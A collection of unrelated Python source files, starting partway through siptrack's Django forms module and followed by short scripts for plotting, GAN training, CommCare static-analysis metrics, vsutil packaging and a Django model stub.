help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
def __init__(self, node_types, *args, **kwargs):
super(TemplateRuleFlushAssociationsAddForm, self).__init__(*args, **kwargs)
choices = []
for node_type in node_types:
choices.append((node_type, node_type))
field = forms.MultipleChoiceField(required = False,
label = 'Included node types',
choices = choices,
help_text = 'If no node types are chosen for include, all types will match.')
self.fields['include'] = field
field = forms.MultipleChoiceField(required = False,
label = 'Excluded node types',
choices = choices)
self.fields['exclude'] = field
class TemplateRulePasswordAddForm(forms.Form):
username = forms.CharField(max_length = 50, label = 'Username',
required = False)
passwd_description = forms.CharField(max_length = 50, label = 'Description',
required = False, help_text = 'Description of the added password.')
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
def __init__(self, password_keys, *args, **kwargs):
super(TemplateRulePasswordAddForm, self).__init__(*args, **kwargs)
keylist = [('__no-password-key__', 'None')]
for key in password_keys:
keylist.append((key.oid, key.attributes['name']))
field = forms.ChoiceField(label = 'Password key', choices = keylist)
self.fields['passwordkey'] = field
class TemplateRuleSubdeviceAddForm(forms.Form):
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
num_devices = forms.IntegerField(label = 'Number of subdevices',
min_value = 1, initial = 1,
help_text = 'Number of subdevices to create.')
sequence_offset = forms.IntegerField(label = 'Sequence offset',
initial = 0,
help_text = 'Base offset of sequence counter used when applying subdevice templates.')
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
def __init__(self, templates, *args, **kwargs):
super(TemplateRuleSubdeviceAddForm, self).__init__(*args, **kwargs)
templatelist = [('none', 'None')]
for template in templates:
templatelist.append((template.oid, template.attributes['name']))
field = forms.ChoiceField(label = 'Template', choices = templatelist)
self.fields['template'] = field
class TemplateRuleAssignNetworkAddForm(forms.Form):
description = forms.CharField(max_length = 80, label = 'Description',
help_text = 'Description of this rule.', required = False)
priority = forms.IntegerField(label = 'Priority',
min_value = 0, initial = 10,
help_text = 'The priority of this rule when using the templates, lower value will be displayed first.')
class NetworkAttributeAddSelectTypeForm(forms.Form):
ruletype = forms.ChoiceField(label = 'Attribute type',
choices = (('text', 'text'),
('bool','boolean')))
class AttributeAddSelectTypeForm(forms.Form):
ruletype = forms.ChoiceField(label = 'Attribute type',
choices = (
('text', 'text'),
('bool', 'boolean'),
('int', 'int')
))
class AttributeUpdateTextForm(forms.Form):
value = forms.CharField(max_length = 50, label = 'New value',
required = False)
class AttributeUpdateBoolForm(forms.Form):
value = forms.BooleanField(label = 'New value (true/false)',
required = False)
class AttributeUpdateIntForm(forms.Form):
value = forms.IntegerField(label = 'New value', initial = 0)
class AttributeUpdateLargeTextForm(forms.Form):
def __init__(self, attribute, *args, **kwargs):
super(AttributeUpdateLargeTextForm, self).__init__(*args, **kwargs)
field = forms.CharField(
max_length=5000,
label=attribute.name,
initial=attribute.value,
required=False,
widget=forms.Textarea(attrs={'cols':'100', 'rows': '20'})
)
self.fields['value'] = field
class AttributeAddTextForm(forms.Form):
name = forms.CharField(
max_length=50,
label='Name',
widget=forms.TextInput(
attrs={
'placeholder': 'Name'
}
)
)
value = forms.CharField(
max_length=50,
label='Value',
required=False,
widget=forms.TextInput(
attrs={
'placeholder': 'Value'
}
)
)
ruletype = forms.CharField(
initial='text',
widget=forms.HiddenInput()
)
large = forms.BooleanField(
label='Large attribute',
required=False,
help_text='Attribute will have a separate display box.'
)
wikitext = forms.BooleanField(
label='Wikitext attribute',
required=False,
help_text='Attribute will be displayed using textile wikitext parsing, implies "large".'
)
hidden = forms.BooleanField(
label='Hidden attribute',
required=False,
help_text='Attribute will hidden per default if it is large/wikitext.'
)
important = forms.BooleanField(
label='Important attribute',
required=False,
help_text='Attribute will be displayed on a device/entities overview page.'
)
versions = forms.IntegerField(
label='Versions',
min_value=1,
initial=1,
help_text='If set to > 1 a versioned attribute will be created.'
)
class PasswordAttributeAddTextForm(AttributeAddTextForm):
encrypted = forms.BooleanField(
label='Encrypted attribute',
required=False,
help_text='Attribute will be encrypted using the same key as the parent password.'
)
class AttributeAddBoolForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
value = forms.ChoiceField(label = 'Value',
choices = (('true', 'True'), ('false', 'False')))
ruletype = forms.CharField(initial = 'bool',
widget = forms.HiddenInput())
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'If set to > 1 a versioned attribute will be created.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
help_text = 'If true, the attribute will be displayed on a device/entities overview page.')
class AttributeAddIntForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
value = forms.IntegerField(label = 'Integer Value', initial = 0)
ruletype = forms.CharField(initial = 'int',
widget = forms.HiddenInput())
versions = forms.IntegerField(label = 'Versions',
min_value = 1, initial = 1,
help_text = 'If set to > 1 a versioned attribute will be created.')
important = forms.BooleanField(label = 'Important attribute',
required = False,
help_text = 'If true, the attribute will be displayed on a device/entities overview page.')
class DeviceCategoryAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
class DeviceCategoryUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
class TemplateSelectForm(forms.Form):
def __init__(self, templates, permit_none = True, *args, **kwargs):
super(TemplateSelectForm, self).__init__(*args, **kwargs)
tmpllist = []
if permit_none:
tmpllist.append((-1, 'None'))
for template in templates:
tmpllist.append((template.oid,
template.attributes.get('name', '[UNKNOWN]')))
field = forms.ChoiceField(label = 'Select template',
choices = tmpllist)
self.fields['template'] = field
class TemplateSetForm(forms.Form):
def __init__(self, template, *args, **kwargs):
super(TemplateSetForm, self).__init__(*args, **kwargs)
rules = list(template.combinedRules())
rules.sort(cmp=lambda x,y: cmp(x.attributes.get('priority', 10), y.attributes.get('priority', 10)))
for rule in rules:
field = None
if rule.class_name == 'template rule text':
wikitext = rule.attributes.get('wikitext', False)
if not wikitext:
field = forms.CharField(max_length = 50,
label = rule.attr_name,
required = False,
help_text = rule.attributes.get('description', None))
elif rule.class_name == 'template rule regmatch':
if rule.attributes.get('description', None):
help_text = '%s (must match: %s)' % (
rule.attributes.get('description'),
rule.regexp
)
else:
help_text = 'Must match: "%s"' % (rule.regexp)
field = forms.RegexField(max_length = 50,
label = rule.attr_name,
regex = rule.regexp, required = False,
help_text = help_text)
elif rule.class_name == 'template rule bool':
field = forms.BooleanField(label = rule.attr_name,
required = False,
initial = rule.default_value,
help_text = rule.attributes.get('description', None))
elif rule.class_name == 'template rule int':
field = forms.IntegerField(label = rule.attr_name,
initial = rule.default_value,
help_text = rule.attributes.get('description', None))
elif rule.class_name == 'template rule subdevice':
field = forms.IntegerField(label = 'Number of subdevices',
required = False,
initial = rule.num_devices,
help_text = rule.attributes.get('description', None))
if field:
self.fields['argument-%s' % (rule.oid)] = field
for rule in template.combinedRules():
if rule.class_name in [
'template rule regmatch', 'template rule bool',
'template rule int', 'template rule subdevice']:
continue
if rule.class_name == 'template rule text':
wikitext = rule.attributes.get('wikitext', False)
if wikitext:
field = forms.CharField(max_length = 50,
label = rule.attr_name,
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', None))
else:
continue
elif rule.class_name == 'template rule password':
initial = ''
if rule.username:
initial = '%s' % (rule.username)
else:
initial = '[no username]'
if rule.description:
initial = '%s - %s' % (initial, rule.description)
field = forms.CharField(label = 'Add password',
required = False,
initial = initial,
widget=forms.TextInput(attrs={'readonly':'readonly'}),
help_text = rule.attributes.get('description', ''))
elif rule.class_name == 'template rule assign network':
field = forms.CharField(label = 'Auto-assign ip-address',
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', ''))
elif rule.class_name == 'template rule fixed':
field = forms.CharField(label = rule.attr_name,
required = False,
initial = rule.value,
widget=forms.TextInput(attrs={'readonly':'readonly'}),
help_text = rule.attributes.get('description', ''))
apply_label = 'Add attribute %s = %s' % (rule.attr_name, rule.value)
elif rule.class_name == 'template rule flush nodes':
field = forms.CharField(label = 'Flush existing nodes',
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', ''))
elif rule.class_name == 'template rule flush associations':
field = forms.CharField(label = 'Flush existing associations',
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', ''))
elif rule.class_name == 'template rule delete attribute':
field = forms.CharField(label = 'Delete attribute',
required = False,
initial = rule.attr_name,
widget=forms.TextInput(attrs={'readonly':'readonly'}),
help_text = rule.attributes.get('description', ''))
else:
field = forms.CharField(label = rule.class_name,
required = False,
widget = forms.HiddenInput(),
help_text = rule.attributes.get('description', ''))
self.fields['argument-%s' % (rule.oid)] = field
# field = forms.BooleanField(label = 'Overwrite',
# required = False,
# initial = True,
# help_text = 'Overwrite existing attributes that have the same name as an attribute being created.')
# self.fields['overwrite'] = field
# self.fields['template'] = forms.CharField(initial = template.oid,
# widget = forms.HiddenInput())
class DeviceSetValuesForm(forms.Form):
def __init__(self, rules, *args, **kwargs):
super(DeviceSetValuesForm, self).__init__(*args, **kwargs)
for rule in rules:
is_wikitext = rule.attributes.get('wikitext', False)
if rule.dtype == 'text' and not is_wikitext:
field = forms.CharField(max_length = 50, label = rule.name,
required = False,
help_text = rule.attributes.get('description', None))
self.fields['attr-%s' % (rule.oid)] = field
elif rule.dtype == 'text' and is_wikitext:
widget = forms.HiddenInput()
field = forms.CharField(label = rule.name, widget = widget,
initial = ' ')
self.fields['attr-%s' % (rule.oid)] = field
elif rule.dtype == 'regmatch':
field = forms.RegexField(max_length = 50, label = rule.name,
regex = rule.value, required = False,
help_text = 'Must match: "%s"' % (rule.value))
self.fields['attr-%s' % (rule.oid)] = field
# elif rule.dtype == 'fixed':
# widget = forms.HiddenInput()
# field = forms.CharField(max_length = 50, label = rule.name,
# widget = widget, initial = rule.value)
# self.fields['attr-%s' % (rule.oid)] = field
if rule.dtype == 'bool':
field = forms.BooleanField(label = rule.name, required = False,
initial = rule.attributes.get('default', True),
help_text = rule.attributes.get('description', None))
self.fields['attr-%s' % (rule.oid)] = field
else:
pass
class DeviceNetworkAddForm(forms.Form):
def __init__(self, network_trees, *args, **kwargs):
super(DeviceNetworkAddForm, self).__init__(*args, **kwargs)
nt_choices = []
for tree in network_trees:
value = (tree.oid, tree.attributes.get('name', '[UNKNOWN]'))
if tree.attributes.get('default', False) is True:
nt_choices.insert(0, value)
else:
nt_choices.append(value)
field = forms.ChoiceField(label = 'Network Tree',
choices = nt_choices,
help_text = 'Network tree for address.')
self.fields['networktree'] = field
self.fields['network_name'] = \
forms.CharField(max_length = 50, label = 'IP-Address',
help_text = 'Valid forms: host: "a.b.c.d", '
'cidr subnet: "a.b.c.d/nn"')
self.fields['description'] = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
class UserAddForm(forms.Form):
user_name = forms.CharField(max_length = 50, label = '<NAME>')
real_name = forms.CharField(max_length = 50, label = 'Real Name (optional)',
required = False)
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
administrator = forms.BooleanField(label = 'Administrator',
required = False,
initial = False)
password = forms.CharField(max_length = 32, label = 'Password',
widget = forms.PasswordInput(), required = True)
validate = forms.CharField(max_length = 32, label = 'Password (again)',
widget = forms.PasswordInput(), required = True)
class UserUpdateAdminForm(forms.Form):
user_name = forms.CharField(max_length = 50, label = 'User Name')
real_name = forms.CharField(max_length = 50, label = 'Real Name (optional)',
required = False)
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
administrator = forms.BooleanField(label = 'Administrator',
required = False,
initial = False)
class UserUpdateForm(forms.Form):
user_name = forms.CharField(max_length = 50, label = 'User Name')
real_name = forms.CharField(max_length = 50, label = 'Real Name (optional)',
required = False)
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
class UserResetPasswordForm(forms.Form):
password = forms.CharField(max_length = 32, label = 'Password',
widget = forms.PasswordInput(), required = False,
help_text = 'Reseting the password for a user will disconnect all subkeys etc. Use this if the old password for the user is unknown.')
validate = forms.CharField(max_length = 32, label = 'Password (again)',
widget = forms.PasswordInput(), required = False)
class UserUpdatePasswordForm(forms.Form):
password = forms.CharField(max_length = 32, label = 'New Password',
widget = forms.PasswordInput(), required = False)
validate = forms.CharField(max_length = 32, label = 'New Password (again)',
widget = forms.PasswordInput(), required = False)
old_password = forms.CharField(max_length = 32, label = 'Old Password',
widget = forms.PasswordInput(), required = False,
help_text = 'Needs to be supplied if you are changing the password of a user other than your own.')
class UserConnectKeyForm(forms.Form):
password_key_key = forms.CharField(max_length = 32, label = 'Password key password',
widget = forms.PasswordInput(), required = False,
help_text = 'Required if the current active user doesn\'t have the selected password key connected.')
def __init__(self, password_keys, require_user_password, *args, **kwargs):
super(UserConnectKeyForm, self).__init__(*args, **kwargs)
self.message = '''
If you're connecting a password key for another user, keep in mind; that
user must logout and login to siptrack before the key will be connected.
'''
keylist = []
for key in password_keys:
value = (key.oid, key.attributes['name'])
if key.attributes.get('default', False) is True:
keylist.insert(0, value)
else:
keylist.append(value)
field = forms.ChoiceField(label = 'Password key', choices = keylist)
self.fields['passwordkey'] = field
if require_user_password:
field = forms.CharField(
max_length=32,
label='User\'s password',
help_text='Required to create the users keypair if they\'ve never logged in before.',
widget=forms.PasswordInput(),
required=False
)
self.fields['user_password'] = field
class UserManagerLocalAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
class UserManagerLDAPAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
connection_type = forms.ChoiceField(label = 'Connection type',
choices = (('ldap', 'ldap'), ('ldaps', 'ldaps')))
server = forms.CharField(max_length = 256, label = 'LDAP server')
port = forms.CharField(max_length = 5, label = 'LDAP server port')
base_dn = forms.CharField(max_length = 128, label = 'Base DN')
valid_groups = forms.CharField(max_length = 1000, label = 'Valid LDAP group',
help_text = 'Only members of the given group will be able to log in, use ":" to seperate groups.',
required = False)
class UserManagerActiveDirectoryAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
server = forms.CharField(max_length = 256, label = 'AD server')
base_dn = forms.CharField(max_length = 128, label = 'Base DN')
valid_groups = forms.CharField(max_length = 1000, label = 'Valid LDAP group',
help_text = 'Only members of the given group will be able to log in, use ":" to seperate groups.',
required = False)
user_domain = forms.CharField(max_length = 128, label = 'User Domain')
class DeviceResetForm(forms.Form):
reset_attributes = forms.BooleanField(label = 'Reset attributes',
required = False,
initial = True)
reset_device_links = forms.BooleanField(label = 'Reset device links',
required = False,
initial = False)
reset_passwords = forms.BooleanField(label = 'Reset passwords',
required = False,
initial = True)
reset_subdevices = forms.BooleanField(label = 'Reset subdevices',
required = False,
initial = True)
class ConfigAddSelectTypeForm(forms.Form):
def __init__(self, parent, *args, **kwargs):
super(ConfigAddSelectTypeForm, self).__init__(*args, **kwargs)
choices = []
if parent.class_name not in ['view tree', 'ipv4 network',
'ipv6 network', 'network tree', 'ipv4 network range',
'ipv6 network range']:
choices.append(('netautoassign', 'Network auto assignment'))
choices.append(('value', 'Config value'))
field = forms.ChoiceField(label = 'Config type', choices = choices)
self.fields['config_type'] = field
class ConfigAddNetworkAutoassignForm(forms.Form):
config_type = forms.CharField(initial = 'netautoassign',
widget = forms.HiddenInput())
def __init__(self, network_trees, *args, **kwargs):
super(ConfigAddNetworkAutoassignForm, self).__init__(*args, **kwargs)
nt_choices = []
for tree in network_trees:
value = (tree.oid, tree.attributes.get('name', '[UNKNOWN]'))
if tree.attributes.get('default', False) is True:
nt_choices.insert(0, value)
else:
nt_choices.append(value)
field = forms.ChoiceField(label = 'Network Tree',
choices = nt_choices,
help_text = 'Network tree for address.')
self.fields['networktree'] = field
self.fields['range_start'] = \
forms.CharField(max_length = 50, label = 'Range Start',
help_text = 'Enter the start address of the range used for assignment"')
self.fields['range_end'] = \
forms.CharField(max_length = 50, label = 'Range End',
help_text = 'Enter the end address of the range used for assignment"')
class ConfigAddValueForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
value = forms.CharField(max_length = 50, label = 'Value', required = False)
config_type = forms.CharField(initial = 'value',
widget = forms.HiddenInput())
class PermissionAddForm(forms.Form):
read_access = forms.BooleanField(label = 'Read access',
required = False)
write_access = forms.BooleanField(label = 'Write access',
required = False)
all_users = forms.BooleanField(label = 'Applies to all users',
required = False)
recursive = forms.BooleanField(label = 'Recursive',
required = False,
help_text = 'Applies recursively up the node tree.')
def __init__(self, users, groups, *args, **kwargs):
super(PermissionAddForm, self).__init__(*args, **kwargs)
field = forms.MultipleChoiceField(required = False,
label = 'Users',
choices = users,
help_text = 'Included users.')
self.fields['users'] = field
field = forms.MultipleChoiceField(required = False,
label = 'Groups',
choices = groups,
help_text = 'Included groups.')
self.fields['groups'] = field
class UserGroupAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description',
required = False)
def __init__(self, users, *args, **kwargs):
super(UserGroupAddForm, self).__init__(*args, **kwargs)
field = forms.MultipleChoiceField(required = False,
label = 'Users',
choices = users,
help_text = 'Included users.')
self.fields['users'] = field
class UserGroupUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 50, label = 'Description (optional)',
required = False)
def __init__(self, users, *args, **kwargs):
super(UserGroupUpdateForm, self).__init__(*args, **kwargs)
field = forms.MultipleChoiceField(required = False,
label = 'Users',
choices = users,
help_text = 'Included users.')
self.fields['users'] = field
class CommandAddForm(forms.Form):
freetext = forms.CharField(max_length = 200, label = 'Command text')
class CommandUpdateForm(forms.Form):
freetext = forms.CharField(max_length = 200, label = 'Command text')
class CommandQueueAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
class CommandQueueUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
class EventTriggerAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
class EventTriggerUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
class EventTriggerRulePythonAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
code = forms.CharField(max_length = 5000, label = 'Code',
help_text = 'python code',
widget = forms.Textarea(attrs={'cols':'80', 'rows': '50'}))
class EventTriggerRulePythonUpdateForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
code = forms.CharField(max_length = 5000, label = 'Code',
help_text = 'python code',
widget = forms.Textarea(attrs={'cols':'80', 'rows': '50'}))
class UsermanagerADSyncUsersForm(forms.Form):
username = forms.CharField(max_length = 50, label = 'Username')
password = forms.CharField(max_length = 32, label = 'Password',
widget = forms.PasswordInput(), required = True)
class PasswordCategoryAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
class DeviceCopyForm(forms.Form):
skip_attributes = forms.BooleanField(label = 'Skip attributes',
required = False, initial = False)
skip_devices = forms.BooleanField(label = 'Skip sub-devices',
required = False, initial = False)
skip_networks = forms.BooleanField(label = 'Skip networks',
required = False, initial = True)
class AttributeEditNotesForm(forms.Form):
notes = forms.CharField(max_length = 50000, label = '',
help_text = '',
required = False,
widget = forms.Textarea(attrs={'cols':'100', 'rows': '15'}))
class AttributeQuickeditForm(forms.Form):
value = forms.CharField(max_length = 100, required = False,
label = 'Value')
class RackUnitOccupiedForm(forms.Form):
reason = forms.CharField(max_length = 500, required = False,
label = 'Reason',
help_text = 'Describe what is occupying this unit.')
class RackUnitReservedForm(forms.Form):
reason = forms.CharField(max_length = 500, required = False,
label = 'Reason',
help_text = 'Describe why this unit is reserved.')
class DeviceConfigAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
max_versions = forms.IntegerField(label = 'Retained versions',
min_value = 0, initial = 10,
help_text = 'The number of config versions to retain, set to 0 for unlimited.')
class DeviceConfigSubmitForm(forms.Form):
data = forms.CharField(max_length = 1000000, label = '',
help_text = '',
required = True,
widget = forms.Textarea(attrs={'cols':'100', 'rows': '15'}))
class DeviceConfigTemplateAddForm(forms.Form):
name = forms.CharField(max_length = 50, label = 'Name')
description = forms.CharField(max_length = 100, required = False,
label = 'Description')
data = forms.CharField(max_length = 1000000, label = '',
help_text = '',
required = True,
widget = forms.Textarea(attrs={'cols':'100', 'rows': '15'}))
class DeviceConfigTemplateSubmitForm(forms.Form):
data = forms.CharField(max_length = 1000000, label = '',
help_text = '',
required = True,
widget = forms.Textarea(attrs={'cols':'100', 'rows': '15'}))
|
38634
|
from woob.capabilities.housing import POSTS_TYPES, HOUSE_TYPES
TYPES = {POSTS_TYPES.RENT: 1,
POSTS_TYPES.SALE: 2,
POSTS_TYPES.FURNISHED_RENT: 1,
POSTS_TYPES.VIAGER: 5}
RET = {HOUSE_TYPES.HOUSE: '2',
HOUSE_TYPES.APART: '1',
HOUSE_TYPES.LAND: '4',
HOUSE_TYPES.PARKING: '3',
HOUSE_TYPES.OTHER: '10'}
|
38662
|
from pathlib import Path
import matplotlib.pyplot as plt
import pandas as pd
results_dir = Path('results')
results_dir.mkdir(exist_ok=True)
# Performance plot
for scale in [3, 4]:
for test_set in ['Set5', 'Set14']:
time = []
psnr = []
model = []
for save_dir in sorted(Path('.').glob(f'*-sc{scale}')):
if 'bicubic' not in save_dir.stem:
model += [save_dir.stem.rsplit('-', 1)[0].upper()]
metrics_file = save_dir / f'test/{test_set}/metrics.csv'
metrics = pd.read_csv(str(metrics_file), index_col='name')
time += [metrics.time.average]
psnr += [metrics.psnr.average]
plt.figure()
plt.semilogx(time, psnr, '.')
plt.grid(True, which='both')
for x, y, s in zip(time, psnr, model):
if 'NS' in s:
s = s.split('-')[1]
plt.text(x, y, s)
plt.xlabel('Run time (sec)')
plt.ylabel('PSNR (dB)')
plt.title(f'Scale {scale} on {test_set}')
plt.savefig(str(results_dir / f'performance-sc{scale}-{test_set}.png'))
plt.close()
# History plot
for scale in [3, 4]:
plt.figure()
for save_dir in sorted(Path('.').glob(f'*-sc{scale}')):
if 'bicubic' not in save_dir.stem:
model = save_dir.stem.rsplit('-', 1)[0].upper()
history_file = save_dir / f'train/history.csv'
history = pd.read_csv(str(history_file))
plt.plot(history.epoch, history.val_psnr, label=model, alpha=0.8)
plt.legend()
plt.xlabel('Epochs')
plt.ylabel('Average test PSNR (dB)')
plt.savefig(str(results_dir / f'history-sc{scale}.png'))
plt.xlim(0, 500)
if scale == 3:
plt.ylim(31.5, 34.5)
if scale == 4:
plt.ylim(29, 32)
plt.savefig(str(results_dir / f'history-sc{scale}-zoom.png'))
plt.close()
|
38671
|
import tensorflow as tf
from nalp.corpus import TextCorpus
from nalp.datasets import LanguageModelingDataset
from nalp.encoders import IntegerEncoder
from nalp.models import RelGAN
# Creating a character TextCorpus from file
corpus = TextCorpus(from_file='data/text/chapter1_harry.txt', corpus_type='char')
# Creating an IntegerEncoder, learning encoding and encoding tokens
encoder = IntegerEncoder()
encoder.learn(corpus.vocab_index, corpus.index_vocab)
encoded_tokens = encoder.encode(corpus.tokens)
# Creating Language Modeling Dataset
dataset = LanguageModelingDataset(encoded_tokens, max_contiguous_pad_length=10, batch_size=64)
# Creating the RelGAN
relgan = RelGAN(encoder=encoder, vocab_size=corpus.vocab_size, max_length=10,
embedding_size=256, n_slots=5, n_heads=5, head_size=25, n_blocks=1, n_layers=3,
n_filters=(64, 128, 256), filters_size=(3, 5, 5), dropout_rate=0.25, tau=5)
# Compiling the GSGAN
relgan.compile(pre_optimizer=tf.optimizers.Adam(learning_rate=0.01),
d_optimizer=tf.optimizers.Adam(learning_rate=0.0001),
g_optimizer=tf.optimizers.Adam(learning_rate=0.0001))
# Pre-fitting the RelGAN
relgan.pre_fit(dataset.batches, epochs=200)
# Fitting the RelGAN
relgan.fit(dataset.batches, epochs=50)
# Saving RelGAN weights
relgan.save_weights('trained/relgan', save_format='tf')
|
38684
|
import os
import re
import subprocess
from collections import Counter
from django.conf import settings
from django.core.management.base import BaseCommand
import datadog
from dimagi.ext.couchdbkit import Document
from corehq.feature_previews import all_previews
from corehq.toggles import all_toggles
class DatadogLogger:
def __init__(self, stdout):
self.stdout = stdout
self.datadog = os.environ.get("TRAVIS_EVENT_TYPE") == 'cron'
if self.datadog:
api_key = os.environ.get("DATADOG_API_KEY")
app_key = os.environ.get("DATADOG_APP_KEY")
assert api_key and app_key, "DATADOG_API_KEY and DATADOG_APP_KEY must both be set"
datadog.initialize(api_key=api_key, app_key=app_key)
self.metrics = []
def log(self, metric, value, tags=None):
self.stdout.write(f"{metric}: {value} {tags or ''}")
if self.datadog:
self.metrics.append({
'metric': metric,
'points': value,
'type': "gauge",
'host': "travis-ci.org",
'tags': [
"environment:travis",
f"travis_build:{os.environ.get('TRAVIS_BUILD_ID')}",
f"travis_number:{os.environ.get('TRAVIS_BUILD_NUMBER')}",
f"travis_job_number:{os.environ.get('TRAVIS_JOB_NUMBER')}",
] + (tags or []),
})
def send_all(self):
if self.datadog:
datadog.api.Metric.send(self.metrics)
self.metrics = []
class Command(BaseCommand):
help = ("Display a variety of code-quality metrics. This is run on every travis "
"build, but only submitted to datadog during the daily cron job.")
def handle(self, **options):
self.stdout.write("----------> Begin Static Analysis <----------")
self.logger = DatadogLogger(self.stdout)
self.show_couch_model_count()
self.show_custom_modules()
self.show_js_dependencies()
self.show_toggles()
self.show_complexity()
self.logger.send_all()
self.stdout.write("----------> End Static Analysis <----------")
def show_couch_model_count(self):
def all_subclasses(cls):
return set(cls.__subclasses__()).union([
s for c in cls.__subclasses__() for s in all_subclasses(c)
])
model_count = len(all_subclasses(Document))
self.logger.log("commcare.static_analysis.couch_model_count", model_count)
def show_custom_modules(self):
custom_module_count = len(set(settings.DOMAIN_MODULE_MAP.values()))
custom_domain_count = len(settings.DOMAIN_MODULE_MAP)
self.logger.log("commcare.static_analysis.custom_module_count", custom_module_count)
self.logger.log("commcare.static_analysis.custom_domain_count", custom_domain_count)
def show_js_dependencies(self):
proc = subprocess.Popen(["./scripts/codechecks/hqDefine.sh", "static-analysis"], stdout=subprocess.PIPE)
output = proc.communicate()[0].strip().decode("utf-8")
(step1, step2, step3) = output.split(" ")
self.logger.log("commcare.static_analysis.hqdefine_file_count", int(step1), tags=[
'status:unmigrated',
])
self.logger.log("commcare.static_analysis.hqdefine_file_count", int(step2), tags=[
'status:hqdefine_only',
])
self.logger.log("commcare.static_analysis.requirejs_file_count", int(step3), tags=[
'status:migrated',
])
def show_toggles(self):
counts = Counter(t.tag.name for t in all_toggles() + all_previews())
for tag, count in counts.items():
self.logger.log("commcare.static_analysis.toggle_count", count, [f"toggle_tag:{tag}"])
def show_complexity(self):
# We can use `--json` for more granularity, but it doesn't provide a summary
output = subprocess.run([
"radon", "cc", ".",
"--min=C",
"--total-average",
"--exclude=node_modules/*,staticfiles/*",
], stdout=subprocess.PIPE).stdout.decode('utf-8').strip()
raw_blocks, raw_complexity = output.split('\n')[-2:]
blocks_pattern = r'^(\d+) blocks \(classes, functions, methods\) analyzed.$'
blocks = int(re.match(blocks_pattern, raw_blocks).group(1))
self.logger.log("commcare.static_analysis.code_blocks", blocks)
complexity_pattern = r'^Average complexity: A \(([\d.]+)\)$'
complexity = round(float(re.match(complexity_pattern, raw_complexity).group(1)), 3)
self.logger.log("commcare.static_analysis.avg_complexity", complexity)
for grade in ["C", "D", "E", "F"]:
count = len(re.findall(f" - {grade}\n", output))
self.logger.log(
"commcare.static_analysis.complex_block_count",
count,
tags=[f"complexity_grade:{grade}"],
)
|
38689
|
from setuptools import setup, find_packages
from setuptools.command.test import test
from distutils.util import convert_path
# We can't import the submodule normally as that would "run" the main module
# code while the setup script is meant to *build* the module.
# Besides preventing a whole possible mess of issues with an un-built package,
# this also prevents the vapoursynth import which breaks the docs on RTD.
# convert_path is used here because according to the distutils docs:
# '...filenames in the setup script are always supplied in Unix
# style, and have to be converted to the local convention before we can
# actually use them in the filesystem.'
meta = {}
exec(open(convert_path('vsutil/_metadata.py')).read(), meta)
class DiscoverTest(test):
def finalize_options(self):
test.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import os
import unittest
path = os.path.join(os.path.dirname(__file__), "tests")
runner = unittest.TextTestRunner(verbosity=2)
suite = unittest.TestLoader().discover(path, pattern="test_*.py")
runner.run(suite)
setup(
name='vsutil',
version=meta['__version__'],
packages=find_packages(exclude=['tests']),
package_data={
'vsutil': ['py.typed']
},
url='https://encode.moe/vsutil',
license='MIT',
author=meta['__author__'].split()[0],
author_email=meta['__author__'].split()[1][1:-1],
description='A collection of general-purpose Vapoursynth functions to be reused in modules and scripts.',
install_requires=[
"vapoursynth"
],
cmdclass={
'test': DiscoverTest
},
python_requires='>=3.8',
project_urls={
'Documentation': 'http://vsutil.encode.moe/en/latest/',
'Source': 'https://github.com/Irrational-Encoding-Wizardry/vsutil',
'Tracker': 'https://github.com/Irrational-Encoding-Wizardry/vsutil/issues',
},
keywords='encoding vapoursynth video',
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Topic :: Multimedia :: Video",
"Typing :: Typed",
],
)
|
38715
|
from django.db import models
from django.utils.translation import ugettext_lazy as _
class DirectoryAccessGroup(models.Model):
"""
Grants expiring group access to the personnel directory.
"""
organization = models.ForeignKey('core.Organization', on_delete=models.CASCADE)
